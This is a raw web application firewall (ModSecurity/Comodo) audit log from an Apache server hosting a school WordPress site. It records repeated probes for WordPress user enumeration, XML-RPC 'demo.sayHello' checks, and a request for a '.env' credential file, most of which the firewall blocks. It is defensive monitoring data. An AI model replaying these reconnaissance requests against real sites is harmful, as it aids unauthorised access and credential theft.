"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690276815301 2588 (- - -) Stopwatch2: 1746690276815301 2588; combined=1056, p1=337, p2=693, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16c39a5d-Z-- --4dbbe708-A-- [08/May/2025:14:44:45 +0700] aBxg7cP9GxxPAbCroFbfkgAAAFM 103.236.140.4 41676 103.236.140.4 8181 --4dbbe708-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4dbbe708-C-- demo.sayHello --4dbbe708-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dbbe708-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690285216110 4940 (- - -) Stopwatch2: 1746690285216110 4940; combined=3499, p1=514, p2=2811, p3=25, p4=28, p5=71, sr=55, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dbbe708-Z-- --637e8266-A-- [08/May/2025:14:44:45 +0700] aBxg7cP9GxxPAbCroFbfkwAAAEQ 103.236.140.4 41694 103.236.140.4 8181 --637e8266-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --637e8266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --637e8266-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690285578714 2029 (- - -) Stopwatch2: 1746690285578714 2029; combined=889, p1=306, p2=561, p3=0, p4=0, p5=22, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --637e8266-Z-- --c6301a71-A-- [08/May/2025:14:44:53 +0700] aBxg9Ss5rYyn3jlLjjLQFwAAAMM 103.236.140.4 42048 103.236.140.4 8181 --c6301a71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6301a71-C-- demo.sayHello --c6301a71-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6301a71-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690293553499 5054 (- - -) Stopwatch2: 1746690293553499 5054; combined=3666, p1=454, p2=3034, p3=27, p4=27, p5=76, sr=59, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6301a71-Z-- --5126fe41-A-- [08/May/2025:14:44:57 +0700] aBxg-Y4K347NtBcwXKwbswAAAIY 103.236.140.4 42226 103.236.140.4 8181 --5126fe41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5126fe41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5126fe41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690297630205 2126 (- - -) Stopwatch2: 1746690297630205 2126; combined=942, p1=354, p2=558, p3=0, p4=0, p5=29, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5126fe41-Z-- --f36f9979-A-- [08/May/2025:14:45:03 +0700] aBxg_44K347NtBcwXKwbvQAAAIs 103.236.140.4 42496 103.236.140.4 8181 --f36f9979-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f36f9979-C-- demo.sayHello --f36f9979-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f36f9979-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690303717762 5599 (- - -) Stopwatch2: 1746690303717762 5599; combined=3982, p1=526, p2=3254, p3=32, p4=30, p5=83, sr=67, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f36f9979-Z-- --f29ea025-A-- [08/May/2025:14:45:04 +0700] aBxhAMP9GxxPAbCroFbf3wAAAEM 103.236.140.4 42542 103.236.140.4 8181 --f29ea025-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f29ea025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29ea025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690304848271 2748 (- - -) Stopwatch2: 1746690304848271 2748; combined=1237, p1=420, p2=787, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29ea025-Z-- --43eded6f-A-- [08/May/2025:14:45:13 +0700] aBxhCY4K347NtBcwXKwb1AAAAIA 103.236.140.4 42892 103.236.140.4 8181 --43eded6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43eded6f-C-- demo.sayHello --43eded6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43eded6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690313410359 5885 (- - -) Stopwatch2: 1746690313410359 5885; combined=4289, p1=541, p2=3542, p3=30, p4=32, p5=85, sr=78, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43eded6f-Z-- --c0f1616b-A-- [08/May/2025:14:46:09 +0700] aBxhQY4K347NtBcwXKwcqwAAAIU 103.236.140.4 45156 103.236.140.4 8181 --c0f1616b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0f1616b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0f1616b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690369113901 2734 (- - -) Stopwatch2: 1746690369113901 2734; combined=1249, p1=392, p2=828, p3=0, p4=0, p5=29, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0f1616b-Z-- --6dcbc171-A-- [08/May/2025:14:46:15 +0700] aBxhR6cs1DvJ_HgMHE8MKQAAAAo 103.236.140.4 45428 103.236.140.4 8181 --6dcbc171-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6dcbc171-C-- demo.sayHello --6dcbc171-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dcbc171-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690375236570 5779 (- - -) Stopwatch2: 1746690375236570 5779; combined=4279, p1=535, p2=3518, p3=31, p4=35, p5=94, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dcbc171-Z-- --d15fd413-A-- [08/May/2025:14:48:52 +0700] aBxh5Kcs1DvJ_HgMHE8NlgAAAAg 103.236.140.4 51842 103.236.140.4 8181 --d15fd413-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d15fd413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d15fd413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690532542320 2805 (- - -) Stopwatch2: 1746690532542320 2805; combined=1154, p1=380, p2=740, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d15fd413-Z-- --88195b4b-A-- [08/May/2025:14:49:02 +0700] aBxh7is5rYyn3jlLjjLSlQAAANM 103.236.140.4 52258 103.236.140.4 8181 --88195b4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88195b4b-C-- demo.sayHello --88195b4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88195b4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690542497404 5446 (- - -) Stopwatch2: 1746690542497404 5446; combined=4370, p1=563, p2=3553, p3=62, p4=37, p5=92, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88195b4b-Z-- --f2f43320-A-- [08/May/2025:15:00:44 +0700] aBxkrI4K347NtBcwXKwlMwAAAJU 103.236.140.4 52020 103.236.140.4 8181 --f2f43320-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2f43320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2f43320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746691244876226 2671 (- - -) Stopwatch2: 1746691244876226 2671; combined=1433, p1=406, p2=985, p3=0, p4=0, p5=42, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2f43320-Z-- --dd03bf44-A-- [08/May/2025:15:00:51 +0700] aBxks6cs1DvJ_HgMHE8U1QAAABY 103.236.140.4 52292 103.236.140.4 8181 --dd03bf44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd03bf44-C-- demo.sayHello --dd03bf44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd03bf44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746691251492056 5340 (- - -) Stopwatch2: 1746691251492056 5340; combined=3922, p1=461, p2=3244, p3=36, p4=32, p5=86, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd03bf44-Z-- --08c6c046-A-- [08/May/2025:15:04:55 +0700] aBxlp6cs1DvJ_HgMHE8XiAAAAAE 103.236.140.4 33912 103.236.140.4 8181 --08c6c046-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --08c6c046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08c6c046-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746691495006358 912 (- - -) Stopwatch2: 1746691495006358 912; combined=326, p1=277, p2=0, p3=0, p4=0, p5=48, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08c6c046-Z-- --34667d08-A-- [08/May/2025:15:16:24 +0700] aBxoWI4K347NtBcwXKwu-wAAAJE 103.236.140.4 33140 103.236.140.4 8181 --34667d08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --34667d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34667d08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746692184864149 4006 (- - -) Stopwatch2: 1746692184864149 4006; combined=2143, p1=657, p2=1453, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34667d08-Z-- --6e97a440-A-- [08/May/2025:15:16:32 +0700] aBxoYMP9GxxPAbCroFbysAAAAE4 103.236.140.4 33432 103.236.140.4 8181 --6e97a440-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e97a440-C-- demo.sayHello --6e97a440-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e97a440-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746692192034110 5650 (- - -) Stopwatch2: 1746692192034110 5650; combined=4214, p1=564, p2=3384, p3=89, p4=32, p5=88, sr=64, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e97a440-Z-- --a396b845-A-- [08/May/2025:15:21:45 +0700] aBxpmY4K347NtBcwXKwxmgAAAIc 103.236.140.4 46142 103.236.140.4 8181 --a396b845-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.18.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.18.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a396b845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a396b845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 